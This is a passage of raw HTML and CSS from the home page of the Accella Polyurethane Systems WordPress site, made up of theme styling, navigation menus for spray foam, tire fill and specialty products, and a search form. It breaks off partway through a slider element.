.grve-bg-primary-5, .grve-bar-line.grve-primary-5-color, #grve-feature-section .grve-style-4 .grve-title.grve-primary-5 span, #grve-post-title #grve-social-share.grve-primary-5 ul li a { background-color: #8CB6CF; color: #ffffff; } .grve-btn.grve-btn-line.grve-bg-primary-5 { color: #8CB6CF; border-color: #8CB6CF; } .grve-btn.grve-bg-primary-5:hover, #grve-post-title #grve-social-share.grve-primary-5 ul li a:hover { background-color: #619CBE; border-color: #619CBE; color: #ffffff; } .grve-portfolio .grve-hover-style-3 .grve-like-counter { color: #6e7177; } .grve-portfolio .grve-hover-style-3 .grve-light-overlay .grve-portfolio-btns:hover, .grve-portfolio .grve-hover-style-3 .grve-dark-overlay .grve-portfolio-btns:hover { background-color: #ff6863; color: #ffffff; } .compose-mode .vc_element .grve-row { margin-top: 30px; } .compose-mode .vc_vc_column .wpb_column { width: 100% !important; margin-bottom: 30px; border: 1px dashed rgba(125, 125, 125, 0.4); } .compose-mode .vc_controls > .vc_controls-out-tl { left: 15px; } .compose-mode .vc_controls > .vc_controls-bc { bottom: 15px; } .compose-mode .vc_welcome .vc_buttons { margin-top: 60px; } .compose-mode .grve-image img { opacity: 1; } .compose-mode #grve-inner-header { top: 0 !important; } .compose-mode .vc_controls > div { z-index: 9; } .compose-mode .grve-bg-image { opacity: 1; } .compose-mode #grve-theme-wrapper .grve-section[data-section-type='fullwidth-background'], .compose-mode #grve-theme-wrapper .grve-section[data-section-type='fullwidth-element'] { visibility: visible; } .compose-mode .grve-animated-item { opacity: 1; } #grve-main-content .vc_tta-tabs.vc_tta-tabs-position-left .vc_tta-tabs-list { padding-right: 30px; } #grve-main-content .vc_tta-tabs.vc_tta-tabs-position-right .vc_tta-tabs-list { padding-left: 30px; } #grve-main-content .vc_tta-accordion .vc_tta-controls-icon-position-left.vc_tta-panel-title > a { padding-left: 20px; } #grve-main-content .vc_tta-accordion .vc_tta-controls-icon-position-left .vc_tta-controls-icon { left: 0; } #grve-main-content .vc_tta-panel-body { padding: 0; margin-top: 12px; } #grve-main-content .vc_tta-accordion .vc_tta-panel-body { padding-left: 20px; margin-top: 0px; } #grve-main-content .vc_tta-accordion .vc_tta-panel { margin-bottom: 1.786em; padding-bottom: 1.286em; border-bottom: 1px solid; border-color: rgba(225, 227, 229, 0.5); } #grve-main-content .vc_tta-accordion .vc_tta-panel:last-child { border-bottom: none; } #grve-main-content .vc_tta-tab > a { border: none; color: #6e7177; background-color: rgba(225, 227, 229, 0.5); line-height: 3.5em; margin-right: 1px; padding: 0 3em; } #grve-main-content .vc_tta-tab > a:hover, #grve-main-content .vc_tta-tab.vc_active > a { background-color: #ff6863; color: #fff; } #grve-main-content .vc_tta-panel.vc_active .vc_tta-panel-title { background-color: #ff6863; color: #fff; border: none; } #grve-main-content .vc_tta-panel-title { font-size: 1.077em; font-weight: 600; border: none; background-color: rgba(225, 227, 229, 0.5); color: #6e7177; } #grve-main-content .vc_tta-accordion .vc_tta-panel-title, #grve-main-content .vc_tta-accordion .vc_tta-panel.vc_active .vc_tta-panel-title { background-color: transparent; color: #6e7177; } </style><!-- Dynamic css --> <style type="text/css"> sup { vertical-align: super; font-size: .5em; } @media (min-width: 1919px){ button.blueSlider { background-color: rgba(54, 137, 187, .65) !important; width: 375px; text-align: center !important; min-height: 150px; vertical-align: middle; position: absolute; padding: 0px 20px !important; bottom: 0px !important; left: 0px; border-radius: 0px !important; } } .margTop30{ margin-top: 30px !important; } h4.grve-post-title { font-size: 23px !important; } #grve-meta-bar-wrapper{ display: none; } #grve-footer-area #recent-posts-4.widget.widget_recent_entries li span.post-date { color:#a0a0a0; text-transform:none; font-size:12px !important; margin:5px 0 0 5px; letter-spacing:0; } .grve-single-post{ border: 0px solid #fff !important; } .post-date{ margin-left: 0px !important; color: #0198E5 !important; } .single-post #grve-header{ background-color: rgba(255,255,255,0) !important; } .mH img{ max-height: 88px; width: auto; } #grve-single-media { text-align: center !important; } #grve-single-media img { max-height: 400px; width: auto !important; } #grve-post-title-content .grve-title span { font-size: 1.3em; font-weight: bold; } .noLabel label{ display: none !important; } #input_1_7_1{ margin-bottom: 15px !important; } .polyOv1{ margin-bottom: 0px !important; background-color: #EEF5FB !important; } .roofImg img{ max-height: 88px; width: auto !important; padding: 13px 10px; } .minSus{ min-height: 465px; } .greyscale{ -webkit-filter: grayscale(100%); /* Safari 6.0 - 9.0 */ filter: grayscale(100%); } .circleImg img{ max-height: 200px !important; width: auto !important; } .sprayFoambg{ background: url(/wp-content/uploads/2017/01/For-the-Spray-Foam-section-on-Sustainability-page.jpg); background-position: center center; background-size: cover !important; min-height: 250px; } .mosaicBG{ background: url(/wp-content/uploads/2017/01/Mosaic.jpg); background-position: center center; background-size: cover; min-height: 250px; } div#text-6{ background: url(/wp-content/uploads/2017/01/map.png); background-position: center center; background-size: contain; background-repeat: no-repeat; } .menu-item .grve-item:hover{ color: #2E94D2 !important; } .col1 img{ opacity: .5 !important; } .col2 img{ opacity: .5 !important; } .col3 img{ opacity: .5 !important; } .col4 img{ opacity: .5 !important; } #grve-header #grve-main-menu ul li ul { top: 99% !important; min-width: 200px; } .imageOverlay{ background-color: #76cbe6; } .imageOverlay img{ opacity: .2; } #grve-header.grve-default #grve-main-menu ul li ul a:hover, #grve-header.grve-default #grve-header-options ul.grve-options a:hover, #grve-header.grve-default #grve-main-menu ul li a .label{ background-color: #4B494D !important; } h4.grve-title{ font-size: 40px !important; } .displayNone{ display: none; } .barBG{ background: url(/wp-content/uploads/2017/01/responsive_bar_1-e1485472338353.jpg); background-repeat: repeat-x; } .bRightBlue{ border-right: 1px solid rgba(54, 137, 187, 1); } .bRightWhite{ border-right: 1px solid #fff; } .noBot{ margin-bottom: 0px !important; } .med{ font-weight: 500 !important; } .topMargin{ margin-top: 75px; } .hovBlue:hover{ background-color: rgba(54, 137, 187, 1) !important; } .chemicalBG{ background: url(/wp-content/uploads/2017/01/block.jpg); background-size: cover; min-height: 500px !important; } .grve-color-primary-1{ color: #0198E5 !important; } #historyBG{ background: url(/wp-content/uploads/2017/01/hex_background.png); background-position: top right; background-repeat: no-repeat !important; } .grve-element.grve-hr.grve-line-dividerblueDivider { background-color: #9BCFEB !important; padding-top: 1px !important; padding-bottom: 1px !important; } .tp-caption{ font-family: "Raleway", sans-serif !important; } .grve-carousel-element .owl-item{ padding: 10px 20px !important; } .grve-carousel-navigation[data-navigation-type="4"].grve-light .grve-carousel-buttons div { color: rgba(0,0,0,1) !important; } .grve-carousel-navigation[data-navigation-type="4"].grve-light .grve-carousel-buttons div:hover { color: rgba(0,0,0,1) !important; } .gform_wrapper ul li.gfield, .gform_wrapper .ginput_complex .ginput_left, .gform_wrapper .ginput_complex .ginput_right, .gform_wrapper .ginput_complex .ginput_full { margin-bottom: 10px !important; } .gform_button{ background-color: #2E94D2 !important; border-radius: 4px; color: #fff !important; padding: 25px; font-weight: normal; min-width: 200px !important; max-width: 280px; max-height: 60px; letter-spacing: 1px; } .gform_button:hover{ background-color: #252525 !important; color: #2E94D2 !important; } .gfield_label{ display: none !important; } h1, .grve-h1 { font-family: "Raleway", sans-serif !important; font-weight: normal !important; } h2, .grve-h2 { font-family: "Raleway", sans-serif !important; font-weight: normal !important; } h3, .grve-h3 { font-family: "Raleway", sans-serif !important; font-weight: normal !important; } h4, .grve-h4 { font-family: "Raleway", sans-serif !important; font-weight: normal !important; } #grve-inner-header{ min-height: 90px !important; } .lightblueBG{ background-color: #EEF5FB !important; margin-bottom: 0px !important; } .greyBG{ background-color: #4E4E4E; } .specialtyBG{ background: url(/wp-content/uploads/2017/01/Photo-8.jpg); background-size: cover; min-height: 250px; } .whiteLink{ color: #fff !important; } .whiteLink:hover { color: #AAABAD !important; } a{ color: #2E95D2 !important; } a:hover{ color: #AAABAD !important; } .whiteLink{ color: #fff !important; } .whiteLink:hover { color: #AAABAD !important; } p{ font-family: 'Raleway', sans-serif !important; line-height: 1.5em !important; font-size: 15px; } .fullBG { background-size: cover !important; } div#newsLinks p { margin-bottom: 5px !important; } #newsLinks p a { color: #000 !important; font-size: 12px; font-weight: bold; letter-spacing: 1px; } #newsLinks p a:hover { color: #45A6DB !important; } #globeRow { margin-bottom: 0px !important; background-size: auto 100% !important; background-image: url(/wp-content/uploads/2017/01/globe.png); background-position: right center !important; background-repeat: no-repeat !important; } #globeRowTire { margin-bottom: 0px !important; background-size: auto 100% !important; background-image: url(/wp-content/uploads/2017/02/globe.jpg); background-position: right center !important; background-repeat: no-repeat !important; } #segmentRow { background-size: cover !important; background-image: url(/wp-content/uploads/2017/01/ExploreLinks_bg.jpg); background-position: center center !important; background-repeat: no-repeat !important; } .socialIcons { background-color: #fff; color: #252525 !important; margin: 0px 5px; padding: 6px 10px; font-size: 18px; border-radius: 3px; } .socialIcons:hover{ background-color: #468AC8 !important; color: #252525 !important; } h5.grve-widget-title { background-image: url(/wp-content/uploads/2017/01/blueBar.png); background-position: left bottom; background-repeat: no-repeat; background-size: 27% auto; } .footerIndustries{ margin-left: 0px !important; } .footerIndustries li{ list-style: none !important; border-bottom: 2px solid #303030 !important; font-size: 13px; padding: 5px 0px; } .bold{ font-weight: bold !important; } button.blueSlider { background-color: rgba(54, 137, 187, .65) !important; min-width: 375px; text-align: center !important; min-height: 150px; vertical-align: middle; position: absolute; padding: 0px 20px !important; bottom: 0px; left: 0px; border-radius: 0px !important; font-family: "Raleway"; font-size: 17px !important; font-weight: bold; letter-spacing: 2px; } button.blueSlider:hover { background-color: rgba(54, 137, 187, 1) !important; color: #fff !important; } .whiteBtn{ text-transform: none !important; font-size: 14px !important; background-color: #fff !important; border-radius: 4px; color: #2E94D2 !important; padding: 25px; font-weight: normal; min-width: 280px; letter-spacing: 1px; max-width: 280px; max-height: 60px; } .whiteBtn:hover{ background-color: #252525 !important; color: #fff !important; } button{ text-transform: none !important; font-size: 14px !important; background-color: #2E94D2 !important; border-radius: 4px; color: #fff !important; padding: 25px; font-weight: normal; min-width: 280px; letter-spacing: 1px; max-width: 280px; max-height: 60px; } button:hover{ background-color: #252525 !important; color: #2E94D2 !important; } .alignRight { text-align: right !important; } .noLR{ padding-left: 200px !important; padding-right: 200px !important; margin-bottom: 0px !important; background-image: url(/wp-content/uploads/2017/02/OurTechnologies.jpg); } .wideImage { min-height: 100% !important; width: 100% !important; height: 100% !important; } .wideImage img{ width: 100% !important; height: 100% !important; } .tWhite{ color: rgba(255,255,255,.75) !important; } .white{ color: #fff !important; } #techBG .grve-bg-image{ background-size: 100%; } .lBlue{ color: rgba(255,255,255,.65) !important; } .whiteSub{ color: #fff !important; font-family: 'Raleway', sans-serif !important; } .whiteTitle{ color: #fff !important; font-family: 'Raleway', sans-serif !important; } .blueTitle{ color: #0198E5 !important; font-family: 'Raleway', sans-serif !important; } .fullWidth{ padding-left: 0px !important; padding-right: 0px !important; } .menu-item .grve-item { color: #fff; font-family: 'Roboto', sans-serif !important; font-weight: normal !important; font-size: 15px !important; letter-spacing: 0px !important; } .menu-item .grve-item:hover { color: rgb(66, 128, 190); } .bluePar{ color: #0199E6 !important; } .grve-color-primary-1, .grve-color-primary-1:before, .grve-color-primary-1:after, #grve-main-content .grve-primary-1 h1, #grve-main-content .grve-primary-1 h2, #grve-main-content .grve-primary-1 h3, #grve-main-content .grve-primary-1 h4, #grve-main-content .grve-primary-1 h5, #grve-main-content .grve-primary-1 h6, #grve-meta-responsive li a:hover, #grve-feature-section .grve-title.grve-primary-1, #grve-page-title .grve-title.grve-primary-1, #grve-post-title .grve-title.grve-primary-1, #grve-portfolio-title .grve-title.grve-primary-1, #grve-product-title .grve-title.grve-primary-1, .grve-portfolio .grve-primary-1 .grve-like-counter, #grve-feature-section .grve-goto-section.grve-primary-1, ul.grve-fields li:before, .widget.widget_calendar a, #grve-main-content .grve-post-title:hover, #grve-main-content .grve-post-author a:hover, .grve-blog.grve-isotope[data-type='pint-blog'] .grve-isotope-item .grve-media-content .grve-post-icon, .grve-blog.grve-isotope[data-type='pint-blog'] .grve-isotope-item.grve-label-post.format-quote a .grve-post-icon:before, #grve-main-content .widget.widget_categories li a:hover, #grve-main-content .widget.widget_archive li a:hover, #grve-main-content .widget.widget_pages li a:hover, #grve-main-content .widget.widget_nav_menu li a:hover, #grve-main-content .widget.widget_nav_menu li.current-menu-item a, #grve-main-content .widget li .rsswidget, #grve-main-content .widget.widget_recent_comments a.url:hover, #grve-main-content .widget.widget_recent_comments a, #grve-main-content .grve-widget.grve-comments a.url:hover, #grve-main-content .grve-widget.grve-comments a, #grve-main-content .widget.widget_meta a:hover, #grve-main-content .widget.widget_recent_entries a:hover, #grve-main-content .widget.grve-contact-info a, #grve-main-content .grve-widget.grve-latest-news a:hover, .grve-tags li a:hover, .grve-categories li a:hover, #grve-main-content .grve-read-more, #grve-main-content .more-link, #grve-comments .comment-reply-link, #grve-comments .grve-comment-item .grve-author a:hover, #grve-comments .grve-comment-item .grve-comment-date a, #grve-comments .comment-edit-link:hover, #respond .comment-reply-title small a, .grve-blog .grve-like-counter span, .grve-pagination ul li a.current, .grve-pagination ul li a:hover, .grve-accordion .grve-title.active:before, .grve-toggle .grve-title.active:before, .grve-filter ul li.selected, .grve-portfolio-item .grve-portfolio-btns li a:hover, #grve-main-content figure.grve-style-1 .grve-team-social li a:hover, #grve-main-content figure.grve-style-2 .grve-team-social li a:hover, #grve-main-content .grve-team a:hover .grve-team-name.grve-dark, #grve-main-content .grve-team a:hover .grve-team-name, .grve-hr .grve-divider-backtotop:after, .grve-testimonial-name span, .grve-testimonial-name:before, .grve-list li:before, #grve-feature-section .grve-description.grve-primary-1, #grve-page-title .grve-description.grve-primary-1, #grve-portfolio-title .grve-description.grve-primary-1, .grve-carousel-wrapper .grve-custom-title-content.grve-primary-1 .grve-caption, .grve-comment-nav ul li a:hover, .grve-pagination ul li .current, .grve-search button[type='submit']:hover .grve-icon-search, .grve-product-item .star-rating span:before, .woocommerce nav.woocommerce-pagination ul li span.current, .woocommerce nav.woocommerce-pagination ul li a:hover, .woocommerce nav.woocommerce-pagination ul li a:focus, .woocommerce #content nav.woocommerce-pagination ul li span.current, .woocommerce #content nav.woocommerce-pagination ul li a:hover, .woocommerce #content nav.woocommerce-pagination ul li a:focus, .woocommerce-page nav.woocommerce-pagination ul li span.current, .woocommerce-page nav.woocommerce-pagination ul li a:hover, .woocommerce-page nav.woocommerce-pagination ul li a:focus, .woocommerce-page #content nav.woocommerce-pagination ul li span.current, .woocommerce-page #content nav.woocommerce-pagination ul li a:hover, .woocommerce-page #content nav.woocommerce-pagination ul li a:focus, .woocommerce table.cart a.remove:hover, .woocommerce #content table.cart a.remove:hover, .woocommerce-page table.cart a.remove:hover, .woocommerce-page #content table.cart a.remove:hover, .woocommerce-page div.product p.price, .woocommerce-page .single_variation, .woocommerce-page tr.order-total td, .woocommerce-checkout .product-quantity, .woocommerce .widget_price_filter .price_slider_amount span.from, .woocommerce-page .widget_price_filter .price_slider_amount span.from, .woocommerce .widget_price_filter .price_slider_amount span.to, .woocommerce-page .widget_price_filter .price_slider_amount span.to, .woocommerce ul.cart_list li a:hover, .woocommerce ul.product_list_widget li a:hover, .woocommerce-page ul.cart_list li a:hover, .woocommerce-page ul.product_list_widget li a:hover, ul.product-categories li a:hover, .woocommerce.widget_product_tag_cloud .tagcloud a:hover, .product_meta a:hover, .woocommerce div.product .woocommerce-tabs ul.tabs li.active a, .woocommerce #content div.product .woocommerce-tabs ul.tabs li.active a, .woocommerce-page div.product .woocommerce-tabs ul.tabs li.active a, .woocommerce-page #content div.product .woocommerce-tabs ul.tabs li.active a, .woocommerce-MyAccount-navigation ul li a:hover { color: #0199E6 !important; } h1.slider-header { line-height: 50px; color: #fff !important; text-align: center !important; } .noPadding .grve-column-1-3{ padding-left: 0px; padding-right: 0px; } p.slider-content{ line-height: 30x; } .blueBtn{ text-align: center; padding: 25px; background-color: #20afff; max-height: 75px; text-transform: none !important; font-size: 9px !important; } .blueBtn:hover{ background-color: #252525 !important; color: #20afff !important; } .blueBtn a { color: #fff !important; text-transform: uppercase; letter-spacing: 2px; } .blueBtn a:hover { color: #20afff !important; } .roundImage img{ border-radius: 50%; border: 2px solid #fff; max-height: 250px; width: auto; } .noMargin{ margin: 0px !important; } #grve-main-content .grve-container{ padding-bottom: 0px !important; padding-top: 0px !important; } #grve-header.grve-default.grve-header-sticky #grve-inner-header{ background-color: rgba(0,0,0,.5) !important; } #grve-header.grve-default #grve-inner-header{ background-color: rgba(0,0,0,0); } #grve-header.grve-default.grve-header-sticky #grve-inner-header{ background-color: rgba(0,0,0,.5) !important; } #grve-header[data-fullscreen='no'] #grve-feature-section .grve-title { font-family: "Open Sans"; font-weight: normal !important; font-style: normal; font-size: 45px; text-transform: none !important; } #grve-header[data-fullscreen='no'] #grve-feature-section .grve-description { font-family: "Open Sans"; font-weight: normal !important; font-style: normal !important; font-size: 20px; text-transform: none !important; } /* footer updates */ #recent-posts-4 a {color: #a0a0a0 !important; } #recent-posts-4 a:hover {color: #fff !important;} #recent-posts-4 li {line-height:1.3em; border-bottom:2px solid #303030 ; padding:12px 0;} #grve-footer-area h5 {padding-bottom: 10px;} @media (max-width: 1200px){ .barBG{ background: url(/wp-content/uploads/2017/01/responsive_bar_2.png); background-repeat: repeat-x; } } @media (max-width: 960px){ .barBG{ background: url(/wp-content/uploads/2017/01/responsive_bar_3.jpg); background-repeat: repeat-x; } } #grve-footer-area .widget.widget_recent_entries li span.post-date:before { content: url('/wp-content/uploads/2017/02/calendaricon1-e1487890351317.jpg'); font-family:FontAwesome; margin-right: 5px; } @media only screen and (min-width: 768px) { .five-columns.grve-row .grve-column-1-6 { float: left; width: 18.8%; padding: 0; margin-right: 1.5%; min-height: 0; } .five-columns.grve-row .grve-column-1-6:nth-last-child(2) { margin-right: 0; } } </style><meta name="generator" content="Powered by Visual Composer - drag and drop page builder for WordPress."/> <!--[if lte IE 9]><link rel="stylesheet" type="text/css" href="https://accellacorp.com/wp-content/plugins/js_composer/assets/css/vc_lte_ie9.min.css" media="screen"><![endif]--><meta name="generator" content="Powered by Slider Revolution 5.3.1 - responsive, Mobile-Friendly Slider Plugin for WordPress with comfortable drag and drop interface." /> <style type="text/css" title="dynamic-css" class="options-output">#grve-footer-area{padding-top:70px;padding-bottom:70px;}#grve-footer-bar{padding-top:20px;padding-bottom:20px;}</style><style type="text/css" data-type="vc_custom-css">.grve-bg-image.show{ background-size: contain !important; background-position: right center !important; background-repeat: no-repeat !important; } .backgroundImageOnly {min-height:200px;}</style><style type="text/css" data-type="vc_shortcodes-custom-css">.vc_custom_1545152273954{padding-top: 50px !important;padding-right: 20px !important;padding-bottom: 50px !important;padding-left: 20px !important;}.vc_custom_1485801454603{margin-top: 0px !important;margin-right: 0px !important;margin-bottom: 0px !important;margin-left: 0px !important;padding-top: 0px !important;padding-right: 0px !important;padding-bottom: 0px !important;padding-left: 0px !important;background-image: url(/wp-content/uploads/2017/01/innovation.jpg?id=100) !important;background-position: center !important;background-repeat: no-repeat !important;background-size: cover !important;}.vc_custom_1485866188489{padding-top: 4.5% !important;padding-right: 5% !important;padding-bottom: 4.5% !important;padding-left: 5% !important;background-color: #0248c2 !important;}.vc_custom_1485866230825{padding-top: 5% !important;padding-right: 5% !important;padding-bottom: 5% !important;padding-left: 5% !important;background-color: #2a2b2f !important;}.vc_custom_1485801701884{margin-top: 0px !important;margin-right: 0px !important;margin-bottom: 0px !important;margin-left: 0px !important;padding-top: 0px !important;padding-right: 0px !important;padding-bottom: 0px !important;padding-left: 0px !important;background-image: url(/wp-content/uploads/2017/01/polyurethane-home.jpg?id=206) !important;background-position: center !important;background-repeat: no-repeat !important;background-size: cover !important;}.vc_custom_1497638023794{margin-top: 0px !important;margin-right: 0px !important;margin-bottom: 0px !important;margin-left: 0px !important;padding-top: 0px !important;padding-right: 0px !important;padding-bottom: 0px !important;padding-left: 0px !important;background-image: url(/wp-content/uploads/2017/01/EcoInitatives.jpg?id=308) !important;background-position: center !important;background-repeat: no-repeat !important;background-size: cover !important;}.vc_custom_1485866244030{padding-top: 5% !important;padding-right: 5% !important;padding-bottom: 5% !important;padding-left: 5% !important;background-color: #0248c2 !important;}.vc_custom_1484881922761{margin-top: 5% !important;}.vc_custom_1487794326246{padding-right: 10% !important;padding-left: 10% !important;}.vc_custom_1487809162166{margin-right: 0px !important;margin-bottom: 0px !important;margin-left: 0px !important;padding-right: 0px !important;padding-bottom: 0px !important;padding-left: 0px !important;}.vc_custom_1487809155134{margin-right: 0px !important;margin-bottom: 0px !important;margin-left: 0px !important;padding-right: 0px !important;padding-bottom: 0px !important;padding-left: 0px !important;}.vc_custom_1487809167973{margin-top: 0px !important;margin-right: 0px !important;margin-left: 0px !important;padding-top: 0px !important;padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1487813560059{margin-bottom: 0px !important;}</style><noscript><style type="text/css"> .wpb_animate_when_almost_visible { opacity: 1; }</style></noscript> </head> <body id="grve-body" class="home page-template-default page page-id-6 wpb-js-composer js-comp-ver-5.0 vc_responsive"> <!-- Responsive Menu --> <nav id="grve-main-menu-responsive" class="grve-style-1 grve-align-left"> <a class="grve-close-menu-button grve-icon-close" href="#"></a> <div class="grve-menu-scroll"> <ul id="menu-main-navigation" class="grve-menu"><li id="menu-item-67" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-home current-menu-item page_item page-item-6 current_page_item menu-item-67"><a href="/"><span class="grve-item">Home</span></a></li> <li id="menu-item-66" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-66"><a href="/about/"><span class="grve-item">About</span></a></li> <li id="menu-item-349" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-349"><a href="#"><span class="grve-item">Products</span></a> <ul class="sub-menu"> <li id="menu-item-494" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-494"><a href="/spray-foam/"><span class="grve-item">Spray Foam</span></a></li> <li id="menu-item-493" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-493"><a href="/tirefill/"><span class="grve-item">Tire Fill</span></a> <ul class="sub-menu"> <li id="menu-item-2085" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-2085"><a href="/tyrfil/"><span class="grve-item">TyrFil</span></a></li> <li id="menu-item-2086" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-2086"><a href="/carefree-tire/"><span class="grve-item">Carefree Tire</span></a></li> </ul> </li> <li id="menu-item-529" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-529"><a href="/specialty-products/"><span class="grve-item">Specialty Products</span></a> <ul class="sub-menu"> <li id="menu-item-2088" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-2088"><a href="/intellathane/"><span class="grve-item">Intellathane</span></a></li> <li id="menu-item-2087" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-2087"><a href="/bulletliner/"><span class="grve-item">Bulletliner</span></a></li> <li id="menu-item-2089" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-2089"><a href="/tru-motion/"><span class="grve-item">Tru-Motion</span></a></li> <li id="menu-item-2090" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-2090"><a href="/tru-seal/"><span class="grve-item">Tru-Seal</span></a></li> </ul> </li> </ul> </li> <li id="menu-item-64" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-64"><a href="/science/"><span class="grve-item">Science</span></a></li> <li id="menu-item-63" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-63"><a href="/sustainability/"><span class="grve-item">Sustainability</span></a></li> <li id="menu-item-61" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-61"><a href="/news/"><span class="grve-item">News</span></a></li> <li id="menu-item-2175" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-2175"><a target="_blank" href="http://careers.carlisleconstructionmaterials.com"><span class="grve-item">Careers</span></a></li> <li id="menu-item-65" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-65"><a href="/contact/"><span class="grve-item">Contact</span></a></li> </ul> </div> </nav> <!-- End Responsive Menu --> <!-- Theme Wrapper --> <div id="grve-theme-wrapper"> <header id="grve-header" data-gotosection="" data-fullscreen="no" data-overlap="yes" data-sticky-header="simply" data-logo-background="transparent" data-logo-align="left" data-menu-align="right" data-menu-type="simply" data-safebutton="no" data-topbar="no" data-menu-options="no" data-header-position="above-feature" data-backtotop="yes" class="grve-default"> <!-- Logo, Main Navigation, Header Options --> <div id="grve-inner-header"> <div class="grve-container"> <h1 class="grve-logo "> <a class="grve-default" href="https://accellacorp.com"><img src="/wp-content/uploads/Accella_Poly_Logo.png" alt="Accella Polyurethane Systems" title="Accella Polyurethane Systems" data-at2x="/wp-content/uploads/Accella_Poly_Logo.png" width="200" height="73" style="height:83px;"></a> <a class="grve-dark" href="https://accellacorp.com"><img src="/wp-content/uploads/2017/01/accellaPerformance-Logo.png" alt="Accella Polyurethane Systems" title="Accella Polyurethane Systems" data-at2x="/wp-content/uploads/2017/01/accellaPerformance-Logo.png" width="2115" height="655" style="height:665px;"></a> <a class="grve-light" href="https://accellacorp.com"><img src="/wp-content/uploads/2017/01/accellaPerformance-Logo.png" alt="Accella Polyurethane Systems" title="Accella Polyurethane Systems" data-at2x="/wp-content/uploads/2017/01/accellaPerformance-Logo.png" width="2115" height="655" style="height:665px;"></a> <a class="grve-sticky" href="https://accellacorp.com"><img src="/wp-content/uploads/Accella_Poly_Logo.png" alt="Accella Polyurethane Systems" title="Accella Polyurethane Systems" data-at2x="/wp-content/uploads/Accella_Poly_Logo.png" width="200" height="73" style="height:83px;"></a> <span>Accella Polyurethane Systems</span> </h1> <!-- Main Menu --> <div class="grve-responsive-menu-button"> <div class="grve-menu-button"> <div class="grve-menu-button-line"></div> <div class="grve-menu-button-line"></div> <div class="grve-menu-button-line"></div> </div> </div> <nav id="grve-main-menu" class="grve-menu-pointer-none" data-animation-style="none"> <ul id="menu-main-navigation-1" class="grve-menu"><li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-home current-menu-item page_item page-item-6 current_page_item menu-item-67"><a href="/"><span class="grve-item">Home</span></a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-66"><a href="/about/"><span class="grve-item">About</span></a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-349"><a href="#"><span class="grve-item">Products</span></a> <ul class="sub-menu"> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-494"><a href="/spray-foam/"><span class="grve-item">Spray Foam</span></a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-493"><a href="/tirefill/"><span class="grve-item">Tire Fill</span></a> <ul class="sub-menu"> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-2085"><a href="/tyrfil/"><span class="grve-item">TyrFil</span></a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-2086"><a href="/carefree-tire/"><span class="grve-item">Carefree Tire</span></a></li> </ul> </li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-529"><a href="/specialty-products/"><span class="grve-item">Specialty Products</span></a> <ul class="sub-menu"> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-2088"><a href="/intellathane/"><span class="grve-item">Intellathane</span></a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-2087"><a href="/bulletliner/"><span class="grve-item">Bulletliner</span></a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-2089"><a href="/tru-motion/"><span class="grve-item">Tru-Motion</span></a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-2090"><a href="/tru-seal/"><span class="grve-item">Tru-Seal</span></a></li> </ul> </li> </ul> </li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-64"><a href="/science/"><span class="grve-item">Science</span></a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-63"><a href="/sustainability/"><span class="grve-item">Sustainability</span></a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-61"><a href="/news/"><span class="grve-item">News</span></a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-2175"><a target="_blank" href="http://careers.carlisleconstructionmaterials.com"><span class="grve-item">Careers</span></a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-65"><a href="/contact/"><span class="grve-item">Contact</span></a></li> </ul> </nav> <!-- End Main Menu --> </div> </div> <div class="clear"></div> <!-- End Logo, Main Navigation, Header Options --> <!-- End Feature Section --> <div id="grve-newsletter-modal" class="grve-modal"> <div class="grve-modal-content"> <a href="#" class="grve-close-modal grve-icon-close"></a> <div class="grve-newsletter"> </div> </div> </div> <div id="grve-search-modal" class="grve-modal"> <div class="grve-modal-content"> <a href="#" class="grve-close-modal grve-icon-close"></a> <form class="grve-search" method="get" action="https://accellacorp.com" > <button type="submit" class="grve-search-btn"><i class="grve-icon-search"></i></button> <input type="text" class="grve-search-textfield" value="" name="s" placeholder="Search for ..." /> </form> </div> </div> <div id="grve-language-modal" class="grve-modal"> <div class="grve-modal-content"> <a href="#" class="grve-close-modal grve-icon-close"></a> <ul class="grve-language"> </ul> </div> </div> <div class="grve-popup-overlay"></div> </header> <div id="grve-main-content"> <div class="grve-container "> <!-- Content Area --> <div id="grve-content-area"> <!-- Content --> <div id="page-6" class="post-6 page type-page status-publish hentry"> <div class="grve-section" style="margin-bottom: 0px;" data-section-title="" data-section-type="fullwidth-background" data-image-type="none" data-full-height="no"> <div class="grve-row grve-bookmark"> <div class="wpb_column grve-column grve-column-1"> <div class="wpb_revslider_element wpb_content_element noMargin"><link href="https://fonts.googleapis.com/css?family=Open+Sans%3A400" rel="stylesheet" property="stylesheet" type="text/css" media="all"> <div id="rev_slider_2_1_wrapper" class="rev_slider_wrapper fullscreen-container" 